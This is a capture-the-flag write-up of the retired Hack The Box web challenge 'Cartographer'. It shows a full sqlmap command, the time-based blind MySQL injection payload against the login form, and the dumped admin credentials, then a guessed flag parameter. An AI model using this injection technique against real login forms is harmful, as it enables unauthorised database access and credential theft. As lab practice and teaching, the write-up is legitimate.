Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.

Challenge info

Cartographer [by Arrexel]
Some underground hackers are developing a new command and control server. Can you break in and see what they are up to?

The Challenge

Visting the web page, we see a login form.

Cartographer login form

Some testing with sqlmap reveal the login form is vulnerable to SQL injection. The DBMS is MySQL.
Eventually I find that the cartographer DB is the one holding interesting data.

$ sqlmap -u -p username,password --data="username=user&password=pass" --dbms=MySQL --level=5 --risk=3 --predict-output --skip="privileges" -D cartographer --exclude-sysdbs --dump

sqlmap identified the following injection point(s) with a total of 143 HTTP(s) requests:
Parameter: username (POST)
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: username=user' AND (SELECT 3085 FROM (SELECT(SLEEP(5)))IYFO) AND 'ECrZ'='ECrZ&password=pass
[... skipped for brevity ...]
[15:41:00] [INFO] fetching tables for databases: 'cartographer, information_schema, mysql, performance_schema, sys'
[15:50:10] [INFO] fetching columns for table 'users' in database 'cartographer'
[15:50:10] [INFO] retrieved: username
[15:50:39] [INFO] retrieved: password
[15:51:09] [INFO] fetching entries for table 'users' in database 'cartographer'
Database: cartographer
Table: users
[1 entry]
| username | password                     |
| admin    | mypasswordisfuckinawesome123 |

With these credentials, we attempt to login on the web page.

The credentials work, and we are redirected to:

Page content after login

Attempting to bruteforce the info parameter didn’t help me much further, nor did attempting any SQL injection or path traversal.

In the end I sought some inspiration on the forums, where it was hinted I should try to enter the thing I was looking for: the flag!

The flag

Visiting finally reveals the treasure/flag: